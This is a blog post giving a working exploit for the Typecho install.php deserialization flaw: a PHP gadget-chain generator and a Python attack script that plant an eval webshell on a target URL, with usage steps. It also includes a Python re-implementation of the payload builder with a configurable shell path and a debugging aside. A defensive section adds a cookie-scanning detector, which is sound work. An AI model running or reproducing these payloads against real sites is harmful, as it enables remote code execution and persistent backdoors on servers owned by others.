Typecho reserved backdoor exp

Source: https://mp.weixin.qq.com/s/kra9OUpwCC7zotDVUmGWyQ

exp.php:

<?php

/**
 * Created by PhpStorm.
 * User: RaI4over
 * Date: 2017/10/19
 * Time: 15:17
 * Generates the value of the __typecho_config cookie.
 *
 * Chain: install.php?finish=1 unserializes the cookie and passes
 * $config['adapter'] to the Typecho_Db constructor, which concatenates it
 * into a string. With an object there, that string conversion runs
 * Typecho_Feed::__toString(), which (for the ATOM 1.0 type) reads
 * $item['author']->screenName. On a Typecho_Request that goes through
 * __get() -> get(), which applies every entry of $_filter to the value via
 * call_user_func(); with 'assert' as the filter the screenName string is
 * evaluated as PHP (string assertions work on PHP 5 and 7.0-7.2).
 *
 * The two classes below are local stand-ins: only the class names and the
 * private property names matter, because they decide what serialize() emits.
 */
class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    private $_type;
    private $_charset;
    private $_lang;
    private $_items = array();
    // $_version is never declared, so PHP stores it as a dynamic public
    // property; the chain does not depend on it.

    public function __construct($version, $type = self::RSS2, $charset = 'UTF-8', $lang = 'en')
    {
        $this->_version = $version;
        $this->_type = $type;
        $this->_charset = $charset;
        $this->_lang = $lang;
    }

    public function addItem(array $item)
    {
        $this->_items[] = $item;
    }
}

class Typecho_Request
{
    // screenName holds the PHP that assert() will evaluate: it drops a one-line webshell
    private $_params = array('screenName'=>'fputs(fopen(\'./a.php\',\'w\'),\'<?php @eval($_POST[minty]);?>\')');
    private $_filter = array('assert');
    //private $_filter = array('assert', array('Typecho_Response', 'redirect'));

}

$payload1 = new Typecho_Feed(5, 'ATOM 1.0');   // ATOM 1.0 is the branch of __toString() that touches author->screenName
$payload2 = new Typecho_Request();
$payload1->addItem(array('author' => $payload2));
$exp['adapter'] = $payload1;   // becomes the Typecho_Db "adapter" argument
$exp['prefix'] = 'MxxY';
echo base64_encode(serialize($exp));

exp.py:

import os
import sys
import requests

if __name__ == '__main__':
    print(r''' ____          ____      _ _  _
| __ ) _  _  |  _ \ __ _(_) || |  _____  _____ _ __
|  _ \| | | |  | |_) / _` | | || |_ / _ \ \ / / _ \ '__|
| |_) | |_| |  |  _ < (_| | |__  _| (_) \ V /  __/ |
|____/ \__, |  |_| \_\__,_|_|  |_|  \___/ \_/ \___|_|
      |___/
    ''')

    target_url = 'https://xxxxx'

    # The vulnerable unserialize() lives in install.php, so it must still be reachable
    rsp = requests.get(target_url + "/install.php")
    if rsp.status_code != 200:
        sys.exit('The attack failed and the problem file does not exist !!!')
    else:
        print('You are lucky, the problem file exists, immediately attack !!!')

    # Optional Burp proxy; pass proxies=proxies to the requests calls below to use it
    proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

    # exp.php prints base64(serialize($exp)); that string is the __typecho_config cookie value
    typecho_config = os.popen('php exp.php').read().strip()

    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
               'Cookie': 'antispame=1508415662; antispamkey=cc7dffeba8d48da508df125b5a50edbd; PHPSESSID=po1hggbeslfoglbvurjjt2lcg0; __typecho_lang=zh_CN;__typecho_config={typecho_config};'.format(typecho_config=typecho_config),
               'Referer': target_url}

    # finish=1 makes install.php unserialize the cookie and hand $config['adapter'] to Typecho_Db
    url = target_url + "/install.php?finish=1"
    requests.get(url, headers=headers, allow_redirects=False)

    # Must match the file path written by the payload in exp.php
    shell_url = target_url + '/a.php'
    if requests.get(shell_url).status_code == 200:
        print('shell_url: ' + shell_url)
    else:
        print("Getshell Fail!")

  • Put exp.php and exp.py in the same directory and change target_url in exp.py to the target URL.
  • The webshell contents and path can be changed in exp.php; after changing them, the path in exp.py must be changed to match.
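Added detection example (my own code, not from the post or from Typecho): the attack above is a single GET to install.php?finish=1 whose only unusual feature is the __typecho_config cookie, so the cheapest check on the defender's side is to decode that cookie and look for serialized PHP objects. install.php only stores an array of scalar database settings in that cookie, so an O:...:{ token there is never legitimate. The cookies and the request list below are constructed samples; scan_requests() takes (path, Cookie header) pairs rather than a particular log format, since stock access logs do not record cookies.

```python
import base64
import binascii
import re

# A PHP object in serialize() output is O:<len>:"<Class>":<count>:{...}.
# install.php only ever stores an array of scalar database settings in
# __typecho_config, so an object token in that cookie means a gadget chain.
OBJECT_TOKEN = re.compile(rb'O:\d+:"([A-Za-z0-9_\\]+)":\d+:\{')


def cookie_value(cookie_header, name):
    """Value of one cookie from a raw Cookie header, or None if absent."""
    for part in cookie_header.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return value
    return None


def decode_typecho_config(cookie_header):
    """Decoded __typecho_config bytes, or None when the cookie is absent.
    PHP's non-strict base64_decode() skips stray characters and tolerates
    missing padding, so be equally lenient rather than let junk dodge the check."""
    value = cookie_value(cookie_header, "__typecho_config")
    if value is None:
        return None
    value = re.sub(r"[^A-Za-z0-9+/]", "", value)
    value += "=" * (-len(value) % 4)
    try:
        return base64.b64decode(value)
    except (binascii.Error, ValueError):
        return None


def gadget_classes(cookie_header):
    """Class names of every serialized object in __typecho_config ([] if none)."""
    blob = decode_typecho_config(cookie_header)
    if blob is None:
        return []
    return [m.group(1).decode("ascii") for m in OBJECT_TOKEN.finditer(blob)]


def scan_requests(requests_seen):
    """Flag requests to install.php whose __typecho_config carries objects.
    requests_seen: iterable of (request path, Cookie header) pairs."""
    hits = []
    for path, cookie in requests_seen:
        if not path.split("?", 1)[0].endswith("/install.php"):
            continue
        classes = gadget_classes(cookie)
        if classes:
            hits.append((path, classes))
    return hits


# Constructed samples: a normal installer cookie, and a truncated gadget chain
# shaped like the one exp.php builds (enough to show the object tokens).
BENIGN_COOKIE = "PHPSESSID=abc; __typecho_config=" + base64.b64encode(
    b'a:2:{s:7:"adapter";s:9:"Pdo_Mysql";s:6:"prefix";s:8:"typecho_";}'
).decode()
MALICIOUS_COOKIE = "__typecho_lang=zh_CN;__typecho_config=" + base64.b64encode(
    b'a:2:{s:7:"adapter";O:12:"Typecho_Feed":1:{s:20:"\x00Typecho_Feed\x00_items";'
    b'a:1:{i:0;a:1:{s:6:"author";O:15:"Typecho_Request":0:{}}}}'
    b's:6:"prefix";s:4:"MxxY";}'
).decode()
SAMPLE_REQUESTS = [
    ("/index.php", "PHPSESSID=abc"),
    ("/install.php", BENIGN_COOKIE),
    ("/install.php?finish=1", MALICIOUS_COOKIE),
]

if __name__ == "__main__":
    for path, classes in scan_requests(SAMPLE_REQUESTS):
        print("%s -> unexpected serialized objects: %s" % (path, ", ".join(classes)))
```

The class list is worth keeping in the alert: Typecho_Feed plus Typecho_Request is exactly the chain from exp.php, while any other class name points at a different gadget and is still a deserialization attempt against install.php.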

Also

When I was trying to modify the exp, I wanted to get the payload without using PHP, so I decoded the base64 output of php exp.php back to the original text, but when I base64-encoded it again I found that the encoded value was different from the earlier one, and I don't know why.

The test script is as follows

import base64

# base64 string printed by `php exp.php`, copied from the terminal
encoded = "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"

decoded = base64.b64decode(encoded)

print(decoded)

# the decoded text, pasted back in by hand
code = b"""a:2:{s:7:"adapter";O:12:"Typecho_Feed":5:{s:19:"Typecho_Feed_type";s:8:"ATOM 1.0";s:22:"Typecho_Feed_charset";s:5:"UTF-8";s:19:"Typecho_Feed_lang";s:2:"en";s:20:"Typecho_Feed_items";a:1:{i:0;a:1:{s:6:"author";O:15:"Typecho_Request":2:{s:24:"Typecho_Request_params";a:1:{s:10:"screenName";s:80:"fputs(fopen('./usr/themes/default/img/tew.php','w'),'<?php @eval($_POST[x]);?>')";}s:24:"Typecho_Request_filter";a:1:{i:0;s:6:"assert";}}}}s:8:"_version";i:5;}s:6:"prefix";s:8:"Rai4over";}"""

re_encoded = base64.b64encode(code)

print(re_encoded == encoded.encode())

Very puzzling... maybe an encoding problem?
I'll update this once I've figured it out.
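Added example for the round-trip mismatch above and for running the exp without PHP (my own code, not part of the original post and not RaI4over's or Typecho's): a Python re-implementation of what serialize() in exp.php emits. The detail that breaks a copy-and-paste round trip is PHP's property-name mangling: a private property is stored under the name "\0ClassName\0property", and the s:N length prefix counts those two NUL bytes (s:19:"\0Typecho_Feed\0_type" is 1 + 12 + 1 + 5). A terminal does not display NUL bytes, so text copied from it has 17-byte names under 19-byte length prefixes; that re-encodes to a different base64 string and would not unserialize on the target either. The builder below reproduces the byte-exact string for the payload in exp.php; the shell path, the POST parameter name and the table prefix are function parameters with the same defaults exp.php uses.

```python
import base64


class PhpObject:
    """Stand-in for a PHP object: class name plus ordered
    (property name, value, visibility) triples."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props


def mangle(cls, name, visibility):
    """PHP stores non-public property names with a NUL-delimited prefix:
    private -> "\\0Class\\0name", protected -> "\\0*\\0name". The NULs are
    real bytes and the s:N length prefix counts them."""
    if visibility == "private":
        return "\0" + cls + "\0" + name
    if visibility == "protected":
        return "\0*\0" + name
    return name


def php_serialize(value):
    """Subset of PHP serialize(): bools, ints, strings, lists, dicts, objects."""
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        # s:N counts bytes, not characters
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, list):
        body = "".join("i:%d;%s" % (i, php_serialize(v)) for i, v in enumerate(value))
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(mangle(value.cls, name, vis)) + php_serialize(v)
            for name, v, vis in value.props
        )
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls), value.cls, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def build_payload(shell_path="./a.php", post_param="minty", prefix="MxxY"):
    """Serialized form of $exp from exp.php (same objects, same defaults)."""
    php_code = "fputs(fopen('%s','w'),'<?php @eval($_POST[%s]);?>')" % (shell_path, post_param)
    request = PhpObject("Typecho_Request", [
        ("_params", {"screenName": php_code}, "private"),
        ("_filter", ["assert"], "private"),
    ])
    feed = PhpObject("Typecho_Feed", [
        ("_type", "ATOM 1.0", "private"),
        ("_charset", "UTF-8", "private"),
        ("_lang", "en", "private"),
        ("_items", [{"author": request}], "private"),
        # exp.php never declares $_version, so PHP serializes it as a
        # dynamic public property after the declared ones
        ("_version", 5, "public"),
    ])
    return php_serialize({"adapter": feed, "prefix": prefix})


def encode_cookie(serialized):
    """serialized text -> base64, as base64_encode() in exp.php does."""
    return base64.b64encode(serialized.encode("utf-8")).decode("ascii")


def decode_cookie(cookie):
    """base64 -> serialized text, as base64_decode() in install.php does."""
    return base64.b64decode(cookie).decode("utf-8")


def typecho_config_cookie(**kwargs):
    """The value exp.py puts in the __typecho_config cookie."""
    return encode_cookie(build_payload(**kwargs))


def strip_nul(serialized):
    """What survives a copy from the terminal: the NUL bytes are gone but
    every s:N still counts them, so the text no longer matches the original."""
    return serialized.replace("\0", "")


if __name__ == "__main__":
    payload = build_payload()
    print(payload.replace("\0", "\\0"))
    print(typecho_config_cookie())
    print("copied text re-encodes identically:",
          encode_cookie(strip_nul(payload)) == typecho_config_cookie())
```

Calling typecho_config_cookie() replaces the os.popen('php exp.php') line in exp.py; pass shell_path and post_param to change the webshell without editing PHP, and keep the path in sync with shell_url as the note above says.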


*Please credit AresX's Blog when reproducing

This blog is published under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License (CC BY-NC-SA 4.0). Please cite the source when reproducing.
Article link: https://ares-x.com/2017/10/28/Typecho预留后门exp/